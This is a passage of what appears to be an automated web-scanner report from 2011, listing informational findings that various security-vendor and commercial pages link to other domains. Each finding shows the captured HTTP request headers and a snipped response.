GET /url?sa=t&source=web&cd=2&ved=0CCEQFjAB&url=http%3A%2F%2Flearn.shavlik.com%2Fshavlik%2Findex.cfm%3Fpg%3D363&ei=Um21TcmnJ83itgeO9OnpDg&usg=AFQjCNE-SEZeBLTzqftyF712qYqdlDQNBQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 302 Found
Location: http://learn.shavlik.com/shavlik/index.cfm?pg=363
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:47:27 GMT
Server: gws
Content-Length: 246
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://learn.shavlik.com/shavlik/index.cfm?pg=363">here</A>
...[SNIP]...
23.87. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=3&ved=0CCcQFjAC&url=http%3A%2F%2Flearn.shavlik.com%2Fshavlik%2Findex.cfm%3Fm%3D521%26pg%3D372%26h%3D0%26hp%3D372&ei=Um21TcmnJ83itgeO9OnpDg&usg=AFQjCNFY-jnfFXDANGn53BN5aNJep4PgYQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 302 Found
Location: http://learn.shavlik.com/shavlik/index.cfm?m=521&pg=372&h=0&hp=372
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:47:21 GMT
Server: gws
Content-Length: 275
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://learn.shavlik.com/shavlik/index.cfm?m=521&amp;pg=372&amp;h=0&amp;hp=372">here</A>
...[SNIP]...
23.88. http://www.googleadservices.com/pagead/conversion/1072501689/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1072501689/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/conversion/1072501689/?random=1303733542110&cv=6&fst=1303733542110&num=1&fmt=1&value=1&label=pageview&bg=FFFFFF&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&ref=http%3A//www.manageengine.com/products/security-manager/store.html&url=http%3A//www.manageengine.com/products/security-manager/download.html HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/download.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Conversion=CoMBQ0NlaVJUV0sxVGJfZ0U0R2cwQUdYN3JSRWtLcXFINWFWb05BT19aMkZXUkFJS0FoUWo1T1c2UF9fX19fX0FXREo3b09JOEtQc0VxQUJ1YWUwX3dQSUFRR3FCQjFQMENmTDFTZ3NRV1BpYU5RT3J1TWttYjNZdGZVYlliVzZQSkpSdncSEwi_vf-kz7eoAhUE3uAKHZUYjgsYASDO0K-h-qz6mWtIAQ

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Mon, 25 Apr 2011 12:12:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Set-Cookie: Conversion=CoMBQ0NlaVJUV0sxVGJfZ0U0R2cwQUdYN3JSRWtLcXFINWFWb05BT19aMkZXUkFJS0FoUWo1T1c2UF9fX19fX0FXREo3b09JOEtQc0VxQUJ1YWUwX3dQSUFRR3FCQjFQMENmTDFTZ3NRV1BpYU5RT3J1TWttYjNZdGZVYlliVzZQSkpSdncSEwi_vf-kz7eoAhUE3uAKHZUYjgsYACCrq-zczvrRxb0BSAE; expires=Wed, 25-May-2011 12:00:36 GMT; path=/pagead/conversion/1072501689/
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072501689/?random=1303733542110&cv=6&fst=1303733542110&num=1&fmt=1&value=1&label=pageview&bg=FFFFFF&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&ref=http%3A//www.manageengine.com/products/security-manager/store.html&url=http%3A//www.manageengine.com/products/security-manager/download.html&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 378

<html><body bgcolor="#ffffff" link="#000000" alink="#000000" vlink="#000000" leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><center><font style="font-size:11px" face="arial,sans-serif" color="#000000">Google Site Stats - <a href="https://services.google.com/sitestats/en.html?cid=1072501689" target="_blank">learn more</a>
...[SNIP]...
23.89. http://www.integritydefender.com/buyerDetails.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.integritydefender.com
Path:   /buyerDetails.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /buyerDetails.php?buyerId=68 HTTP/1.1
Host: www.integritydefender.com
Proxy-Connection: keep-alive
Referer: http://www.integritydefender.com/buyerDetails.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=da4c413fd2f41e463cb4aac35dcd5799

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:47:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 13389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</script>
<script language="javascript" src="http://www.instantengage.com/IE_Utility.js"></script>
<script language="javascript" src="http://www.instantengage.com/IE_CStart.js"></script>
...[SNIP]...
<td width="461" align="right" >Website Designed, Developed &amp; Maintained by :<a href="http://www.officialgates.com/"><img src="images/og-icon.jpg" alt="Officialgates technologies Pvt Ltd" width="30" height="23" border="0" title="Officialgates technologies Pvt Ltd" />
...[SNIP]...
23.90. http://www.iveco-ptc.spb.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iveco-ptc.spb.ru
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU HTTP/1.1
Host: www.iveco-ptc.spb.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:32:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=32638563fd192774612570ede2bad57a; path=/
Content-Length: 19221

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="
...[SNIP]...
<li class=""><a href="http://www.nh-ptc.ru/" class="" target="_blank">........................ ..............</a>
...[SNIP]...
<!-- Yandex.Metrika counter -->
<script src="//mc.yandex.ru/metrika/watch.js"
type="text/javascript"></script>
...[SNIP]...
<div><img src="//mc.yandex.ru/watch/157241"
style="position:absolute; left:-9999px;" alt="" /></div>
...[SNIP]...
23.91. http://www.manageengine.com/products/security-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /products/security-manager/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.2.10.1303732848
If-None-Match: "d3ec-49f24fc659f40"
If-Modified-Since: Wed, 23 Mar 2011 11:51:49 GMT

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:53 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 11:51:49 GMT
ETag: "d3ec-49f24fc659f40"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:11:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 54252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan
...[SNIP]...
<div class="smp_live_demo"><a name="Security-Manager-Plus-Live-Demo" title="Security Manager Plus Live Demo" href="http://demo.securitymanagerplus.com/">Security Manager Plus Live Demo</a>
...[SNIP]...
</span>&nbsp;<a href="http://www.zohocorp.com/"><strong>
...[SNIP]...
</a>. All rights reserved. <a href="http://www.webnms.com" title="WebNMS Home" name="WebNMS-Home">WebNMS Home</a>
...[SNIP]...
<br />
<a href="http://www.site24x7.com" class="secondlevellink" title="Website Monitoring" name="Website-Monitoring">Website Monitoring</a>
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
23.92. http://www.manageengine.com/products/security-manager/download.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /products/security-manager/download.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products/security-manager/download.html?features HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:12:03 GMT
Server: Apache
Last-Modified: Mon, 25 Apr 2011 10:28:00 GMT
ETag: "15369-4a1bba9688c00"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:12:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 86889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<img height=1 width=1 border=0 src="http://www.googleadservices.com/pagead/conversion/1072501689/?value=1&label=pageview&script=0">
</noscript>
...[SNIP]...
</script><script id="mstag_tops"type="text/javascript"src="//flex.atdmt.com/mstag/site/b060e217-431e-47e2-b8f7-c11fe85e301e/mstag.js"></script>
...[SNIP]...
<noscript><iframe src="//flex.atdmt.com/mstag/tag/b060e217-431e-47e2-b8f7-c11fe85e301e/conversion.html?cp=5050&dedup=1"frameborder="0"scrolling="no"width="1"height="1"style="visibility:hidden;display:none"></iframe>
...[SNIP]...
<div class="smp_live_demo"><a name="Security-Manager-Plus-Live-Demo" title="Security Manager Plus Live Demo" href="http://demo.securitymanagerplus.com/">Security Manager Plus Live Demo</a>
...[SNIP]...
</span>&nbsp;<a href="http://www.zohocorp.com/"><strong>
...[SNIP]...
</a>. All rights reserved. <a href="http://www.webnms.com" title="WebNMS Home" name="WebNMS-Home">WebNMS Home</a>
...[SNIP]...
<br />
<a href="http://www.site24x7.com" class="secondlevellink" title="Website Monitoring" name="Website-Monitoring">Website Monitoring</a>
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
23.93. http://www.outpost24.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outpost24.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?gclid=CIzv2JrPt6gCFQUQNAod6VpNBg HTTP/1.1
Host: www.outpost24.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wooTracker=Z0OLUUFD2A8CJ3SSJOPK3JITJKI5488S; wooMeta=MTA0MTM1JjEmMSYyNDI5MzYmMTMwMzczMjgxODc3OCYxMzAzNzMzMDYxNjk3JiYxMDAmJjUwMDExNSYmJiY=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:27 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 12630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       
...[SNIP]...
<![endif]-->
       <script src="http://www.google-analytics.com/urchin.js" type="text/javascript" language="JavaScript1.2" />
       <script type="text/javascript" language="JavaScript1.2">
...[SNIP]...
</script>
       <script src="http://static.woopra.com/js/woopra.js"></script>
...[SNIP]...
<div><a href="http://cve.mitre.org" target="_blank"><img src="/images/cve_small.png" alt="CVE" id="PageCveLogo" border="0" />
...[SNIP]...
<div><a href="https://www.pcisecuritystandards.org" target="_blank"><img src="/images/pci_ssc_asv.jpg" alt="PCI" id="PagePciLogo" border="0" />
...[SNIP]...
23.94. http://www.praetorian.com/external-network-penetration-test.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.praetorian.com
Path:   /external-network-penetration-test.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /external-network-penetration-test.html?gclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ HTTP/1.1
Host: www.praetorian.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116139463.1303732836.1.1.utmgclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=116139463.239124078.1303732836.1303732836.1303732836.1; __utmc=116139463

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:37 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 13262
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
   
...[SNIP]...
<noscript>
                   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="647" height="295" id="currentnews" align="middle">
                       <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
</h4>
               <a href="http://www.twitter.com/praetorianlabs" target="_blank" style="text-decoration:none;">
                   <img src="images/socialmedia/twitter.png" height="32" width="32" border="0" alt="twitter" />
...[SNIP]...
</a>
               <a href="http://www.facebook.com/praetorianlabs" target="_blank" style="text-decoration:none;">
                   <img src="images/socialmedia/facebook.png" height="32" width="32" border="0" alt="facebook" />
...[SNIP]...
</a>
               <a href="http://www.linkedin.com/companies/praetorian" target="_blank" style="text-decoration:none;">
                   <img src="images/socialmedia/linkedin.png" height="32" width="32" border="0" alt="linkedin" />
...[SNIP]...
</a>
               <a href="http://feeds.feedburner.com/PraetorianLabs" target="_blank" style="text-decoration:none;">
                   <img src="images/socialmedia/rss.png" height="32" width="32" border="0" alt="rss" />
...[SNIP]...
23.95. http://www.smpone.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:17:47 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733867; expires=Mon, 25-Apr-2011 12:27:47 GMT; path=/
Content-Type: text/html
Content-Length: 15026

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants</title>
<meta
...[SNIP]...
<noscript>
   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="500" height="380" id="homeshow" align="middle">
   <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<noscript>
   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="242" height="230" id="menu_right" align="middle">
   <param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<td valign="bottom"><a href="http://www.facebook.com/pages/Security-Management-Partners/152915868089107"><img src="images/uploads/facebook.png" border="0" alt="facebook" /></a><a href="http://twitter.com/smpflash"><img src="images/uploads/TwitterIcon.png" border="0" alt="twitter" />
...[SNIP]...
<td><a href="http://www.tresware.com/" target="_blank"><img src="images/tresware.gif" border="0" alt="Tresware" width="95" height="16" />
...[SNIP]...
23.96. http://www.stillsecure.com/m/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /m/?c=request-a-trial&product=VAM HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/vam/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.2.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:57:19 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 16384

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...
<li><a href="https://radar.protectpoint.com/usermanager/login.php" target="_blank" onmouseover="toggleme('showme','servicesdropdown');" onmouseout="toggleme('hideme','servicesdropdown');">RADAR&trade; customer portal</a>
...[SNIP]...
<li><a href="http://partner.protectpoint.net/" onmouseover="toggleme('showme','partnerdropdown');" onmouseout="toggleme('hideme','partnerdropdown');">PartnerVision Portal</a>
...[SNIP]...
<li><a href="http://www.thesecuritysamurai.com" onmouseover="toggleme('showme','companydropdown');" onmouseout="toggleme('hideme','companydropdown');">Security Samurai Blog</a>
...[SNIP]...
23.97. http://www.trucklist.ru/cars/trucks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /cars/trucks

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:37:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1b167314767bdffd9a5c5c390d79c0cc; path=/; domain=trucklist.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: records_per_page=30; expires=Tue, 24-Apr-2012 14:22:59 GMT; path=/; domain=.trucklist.ru
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:23:12 GMT
Content-Length: 139769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru">
<head>
   <meta htt
...[SNIP]...
<li><a href="http://www.moscow.trucklist.ru/" onclick="set_current_region(this, 'russian'); return false;">............</a>
...[SNIP]...
